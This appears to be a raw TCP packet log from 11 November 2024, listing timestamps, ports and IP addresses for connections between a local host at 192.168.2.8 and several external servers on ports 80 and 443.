                                                                                                                                                                                                              Nov 11, 2024 18:35:03.247749090 CET57738443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:35:03.247812033 CET44357738188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:03.247894049 CET57738443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:35:03.248392105 CET57738443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:35:03.248419046 CET44357738188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:03.403162003 CET805773575.2.71.199192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:03.404491901 CET5773580192.168.2.875.2.71.199
                                                                                                                                                                                                              Nov 11, 2024 18:35:03.412110090 CET5773580192.168.2.875.2.71.199
                                                                                                                                                                                                              Nov 11, 2024 18:35:03.417211056 CET805773575.2.71.199192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:03.560759068 CET8057736208.100.26.245192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:03.560838938 CET5773680192.168.2.8208.100.26.245
                                                                                                                                                                                                              Nov 11, 2024 18:35:03.681744099 CET44357738188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:03.684518099 CET57738443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:35:03.685056925 CET57738443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:35:03.685065031 CET44357738188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:03.771915913 CET805773791.195.240.19192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:03.771981955 CET5773780192.168.2.891.195.240.19
                                                                                                                                                                                                              Nov 11, 2024 18:35:03.771985054 CET805773791.195.240.19192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:03.771996975 CET805773791.195.240.19192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:03.772042036 CET5773780192.168.2.891.195.240.19
                                                                                                                                                                                                              Nov 11, 2024 18:35:03.772142887 CET805773791.195.240.19192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:03.772156000 CET805773791.195.240.19192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:03.772170067 CET805773791.195.240.19192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:03.772200108 CET5773780192.168.2.891.195.240.19
                                                                                                                                                                                                              Nov 11, 2024 18:35:03.772224903 CET5773780192.168.2.891.195.240.19
                                                                                                                                                                                                              Nov 11, 2024 18:35:03.772511005 CET805773791.195.240.19192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:03.772522926 CET805773791.195.240.19192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:03.772536993 CET805773791.195.240.19192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:03.772572041 CET5773780192.168.2.891.195.240.19
                                                                                                                                                                                                              Nov 11, 2024 18:35:03.772597075 CET5773780192.168.2.891.195.240.19
                                                                                                                                                                                                              Nov 11, 2024 18:35:03.772903919 CET805773791.195.240.19192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:03.774611950 CET5773780192.168.2.891.195.240.19
                                                                                                                                                                                                              Nov 11, 2024 18:35:03.776899099 CET805773791.195.240.19192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:03.776945114 CET5773780192.168.2.891.195.240.19
                                                                                                                                                                                                              Nov 11, 2024 18:35:03.776972055 CET805773791.195.240.19192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:03.780483007 CET5773780192.168.2.891.195.240.19
                                                                                                                                                                                                              Nov 11, 2024 18:35:03.860619068 CET805773791.195.240.19192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:03.860651016 CET805773791.195.240.19192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:03.860662937 CET805773791.195.240.19192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:03.860677958 CET5773780192.168.2.891.195.240.19
                                                                                                                                                                                                              Nov 11, 2024 18:35:03.860697031 CET5773780192.168.2.891.195.240.19
                                                                                                                                                                                                              Nov 11, 2024 18:35:03.860738039 CET5773780192.168.2.891.195.240.19
                                                                                                                                                                                                              Nov 11, 2024 18:35:03.860924006 CET805773791.195.240.19192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:03.860937119 CET805773791.195.240.19192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:03.861022949 CET5773780192.168.2.891.195.240.19
                                                                                                                                                                                                              Nov 11, 2024 18:35:03.861253023 CET805773791.195.240.19192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:03.861265898 CET805773791.195.240.19192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:03.861277103 CET805773791.195.240.19192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:03.861295938 CET5773780192.168.2.891.195.240.19
                                                                                                                                                                                                              Nov 11, 2024 18:35:03.861310005 CET5773780192.168.2.891.195.240.19
                                                                                                                                                                                                              Nov 11, 2024 18:35:03.867465019 CET805773791.195.240.19192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:03.867481947 CET805773791.195.240.19192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:03.867497921 CET805773791.195.240.19192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:03.867592096 CET5773780192.168.2.891.195.240.19
                                                                                                                                                                                                              Nov 11, 2024 18:35:03.867592096 CET5773780192.168.2.891.195.240.19
                                                                                                                                                                                                              Nov 11, 2024 18:35:04.124299049 CET57738443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:35:04.124322891 CET44357738188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:04.334510088 CET5773980192.168.2.8154.212.231.82
                                                                                                                                                                                                              Nov 11, 2024 18:35:04.339359045 CET8057739154.212.231.82192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:04.339457035 CET5773980192.168.2.8154.212.231.82
                                                                                                                                                                                                              Nov 11, 2024 18:35:04.339593887 CET5773980192.168.2.8154.212.231.82
                                                                                                                                                                                                              Nov 11, 2024 18:35:04.344893932 CET8057739154.212.231.82192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.028166056 CET44357738188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.028219938 CET57738443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.028230906 CET44357738188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.028289080 CET44357738188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.028311014 CET57738443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.028315067 CET44357738188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.028331995 CET57738443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.028353930 CET57738443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.028357029 CET44357738188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.028392076 CET57738443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.028405905 CET44357738188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.028508902 CET57738443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.028512001 CET44357738188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.028661013 CET44357738188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.028676987 CET57738443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.028680086 CET44357738188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.028692961 CET57738443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.028711081 CET57738443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.028775930 CET57738443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.028786898 CET57738443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.031531096 CET5772680192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.031843901 CET5774080192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.036673069 CET8057740188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.036731958 CET5774080192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.036906004 CET8057726188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.036922932 CET5774080192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.036945105 CET5772680192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.041676044 CET8057740188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.146245003 CET8057734199.191.50.83192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.146270990 CET8057734199.191.50.83192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.146281958 CET8057734199.191.50.83192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.146303892 CET5773480192.168.2.8199.191.50.83
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.146326065 CET5773480192.168.2.8199.191.50.83
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.146440029 CET8057734199.191.50.83192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.146451950 CET8057734199.191.50.83192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.146465063 CET8057734199.191.50.83192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.146502018 CET5773480192.168.2.8199.191.50.83
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.146855116 CET8057734199.191.50.83192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.146864891 CET8057734199.191.50.83192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.146876097 CET8057734199.191.50.83192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.146888971 CET8057734199.191.50.83192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.146902084 CET5773480192.168.2.8199.191.50.83
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.146928072 CET5773480192.168.2.8199.191.50.83
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.151741982 CET8057734199.191.50.83192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.151884079 CET8057734199.191.50.83192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.151937008 CET5773480192.168.2.8199.191.50.83
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.151994944 CET8057734199.191.50.83192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.152036905 CET5773480192.168.2.8199.191.50.83
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.227494001 CET8057734199.191.50.83192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.227528095 CET8057734199.191.50.83192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.227539062 CET8057734199.191.50.83192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.227576017 CET5773480192.168.2.8199.191.50.83
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.227608919 CET5773480192.168.2.8199.191.50.83
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.227807045 CET8057734199.191.50.83192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.227818966 CET8057734199.191.50.83192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.227847099 CET5773480192.168.2.8199.191.50.83
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.227861881 CET5773480192.168.2.8199.191.50.83
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.228040934 CET8057734199.191.50.83192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.228090048 CET5773480192.168.2.8199.191.50.83
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.228194952 CET8057734199.191.50.83192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.228207111 CET8057734199.191.50.83192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.228234053 CET5773480192.168.2.8199.191.50.83
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.228255987 CET5773480192.168.2.8199.191.50.83
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.228482962 CET8057734199.191.50.83192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.228493929 CET8057734199.191.50.83192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.228554964 CET5773480192.168.2.8199.191.50.83
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.228703022 CET8057734199.191.50.83192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.228759050 CET5773480192.168.2.8199.191.50.83
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.228885889 CET8057734199.191.50.83192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.228898048 CET8057734199.191.50.83192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.228930950 CET5773480192.168.2.8199.191.50.83
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.229151011 CET8057734199.191.50.83192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.229162931 CET8057734199.191.50.83192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.229203939 CET5773480192.168.2.8199.191.50.83
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.229497910 CET8057734199.191.50.83192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.229537964 CET5773480192.168.2.8199.191.50.83
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.229614973 CET8057734199.191.50.83192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.229625940 CET8057734199.191.50.83192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.229650974 CET5773480192.168.2.8199.191.50.83
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.229682922 CET5773480192.168.2.8199.191.50.83
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.229877949 CET8057734199.191.50.83192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.229891062 CET8057734199.191.50.83192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.229921103 CET5773480192.168.2.8199.191.50.83
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.230372906 CET8057734199.191.50.83192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.230489969 CET8057734199.191.50.83192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.230499983 CET8057734199.191.50.83192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.230501890 CET5773480192.168.2.8199.191.50.83
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.230521917 CET5773480192.168.2.8199.191.50.83
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.230546951 CET5773480192.168.2.8199.191.50.83
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.232413054 CET8057734199.191.50.83192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.232454062 CET5773480192.168.2.8199.191.50.83
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.232518911 CET8057734199.191.50.83192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.232557058 CET5773480192.168.2.8199.191.50.83
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.261358976 CET8057739154.212.231.82192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.261454105 CET5773980192.168.2.8154.212.231.82
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.263849020 CET5773980192.168.2.8154.212.231.82
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.268652916 CET8057739154.212.231.82192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.308535099 CET8057734199.191.50.83192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.308563948 CET8057734199.191.50.83192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.308593988 CET5773480192.168.2.8199.191.50.83
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.308618069 CET5773480192.168.2.8199.191.50.83
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.626763105 CET8057739154.212.231.82192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.626816034 CET5773980192.168.2.8154.212.231.82
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.732727051 CET8057740188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.732820988 CET5774080192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.738413095 CET57741443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.738470078 CET44357741188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.738537073 CET57741443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.738876104 CET57741443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.738888025 CET44357741188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:06.169783115 CET44357741188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:06.169912100 CET57741443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:35:06.175736904 CET57741443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:35:06.175754070 CET44357741188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:06.175978899 CET44357741188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:06.176085949 CET57741443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:35:06.176496029 CET57741443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:35:06.223330021 CET44357741188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:07.506508112 CET5012180192.168.2.8199.59.243.227
                                                                                                                                                                                                              Nov 11, 2024 18:35:07.506524086 CET5012280192.168.2.864.190.63.136
                                                                                                                                                                                                              Nov 11, 2024 18:35:07.506531954 CET5010680192.168.2.8199.59.243.227
                                                                                                                                                                                                              Nov 11, 2024 18:35:07.522128105 CET5011380192.168.2.891.195.240.19
                                                                                                                                                                                                              Nov 11, 2024 18:35:07.522144079 CET5010780192.168.2.8162.255.119.102
                                                                                                                                                                                                              Nov 11, 2024 18:35:07.698059082 CET44357741188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:07.698103905 CET44357741188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:07.698118925 CET57741443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:35:07.698146105 CET44357741188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:07.698165894 CET57741443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:35:07.698178053 CET57741443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:35:07.698180914 CET44357741188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:07.698191881 CET44357741188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:07.698221922 CET57741443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:35:07.698227882 CET44357741188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:07.698267937 CET57741443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:35:07.698661089 CET44357741188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:07.698698044 CET57741443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:35:07.698704004 CET44357741188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:07.698734999 CET44357741188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:07.698769093 CET57741443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:35:07.698776007 CET44357741188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:07.699383020 CET44357741188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:07.699433088 CET57741443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:35:07.699440002 CET44357741188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:07.699476957 CET57741443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:35:07.702658892 CET44357741188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:07.702783108 CET44357741188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:07.702826023 CET57741443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:35:07.702831984 CET44357741188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:07.703001022 CET44357741188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:07.703042030 CET57741443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:35:07.703047991 CET44357741188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:07.703078985 CET57741443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:35:07.703231096 CET44357741188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:07.703563929 CET44357741188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:07.703597069 CET57741443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:35:07.703598022 CET44357741188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:07.703608036 CET44357741188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:07.703641891 CET57741443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:35:07.703919888 CET44357741188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:07.703953981 CET57741443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:35:07.703998089 CET44357741188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:07.704221964 CET44357741188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:07.704256058 CET57741443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:35:07.704258919 CET44357741188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:07.704267025 CET44357741188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:07.704302073 CET57741443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:35:07.704864979 CET44357741188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:07.704904079 CET57741443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:35:07.704916000 CET44357741188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:07.705116034 CET44357741188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:07.705152988 CET57741443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:35:07.705159903 CET44357741188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:07.705750942 CET44357741188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:07.705791950 CET57741443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:35:07.705796957 CET44357741188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:07.705831051 CET57741443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:35:07.705847025 CET44357741188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:07.706026077 CET57741443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:35:07.706029892 CET44357741188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:07.706149101 CET57741443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:35:07.706471920 CET44357741188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:07.706510067 CET57741443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:35:07.707458019 CET44357741188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:07.707505941 CET57741443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:35:07.707549095 CET44357741188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:07.707989931 CET44357741188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:07.708036900 CET57741443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:35:07.708043098 CET44357741188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:07.708429098 CET44357741188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:07.708472013 CET57741443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:35:07.708477020 CET44357741188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:07.708506107 CET57741443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:35:07.708911896 CET44357741188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:07.708957911 CET57741443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:35:07.709418058 CET44357741188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:07.709465027 CET57741443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:35:07.710088968 CET44357741188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:07.710136890 CET57741443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:35:07.710581064 CET44357741188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:07.710628033 CET57741443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:35:07.711092949 CET44357741188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:07.711146116 CET57741443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:35:07.712399960 CET44357741188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:07.712455988 CET44357741188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:07.712498903 CET57741443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:35:07.714972973 CET57741443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:35:07.714993954 CET44357741188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:08.862304926 CET805773791.195.240.19192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:08.862364054 CET5773780192.168.2.891.195.240.19
                                                                                                                                                                                                              Nov 11, 2024 18:35:10.732322931 CET8054072178.162.203.202192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:10.732799053 CET5407280192.168.2.8178.162.203.202
                                                                                                                                                                                                              Nov 11, 2024 18:35:12.987432003 CET8057727199.59.243.227192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:12.987495899 CET5772780192.168.2.8199.59.243.227
                                                                                                                                                                                                              Nov 11, 2024 18:35:14.963300943 CET5407280192.168.2.8178.162.203.202
                                                                                                                                                                                                              Nov 11, 2024 18:35:14.968272924 CET8054072178.162.203.202192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:17.115896940 CET5012180192.168.2.8199.59.243.227
                                                                                                                                                                                                              Nov 11, 2024 18:35:17.115920067 CET5012280192.168.2.864.190.63.136
                                                                                                                                                                                                              Nov 11, 2024 18:35:17.115997076 CET5010680192.168.2.8199.59.243.227
                                                                                                                                                                                                              Nov 11, 2024 18:35:17.131522894 CET5011380192.168.2.891.195.240.19
                                                                                                                                                                                                              Nov 11, 2024 18:35:17.131542921 CET5010780192.168.2.8162.255.119.102
                                                                                                                                                                                                              Nov 11, 2024 18:35:18.018769979 CET8054073162.255.119.102192.168.2.8
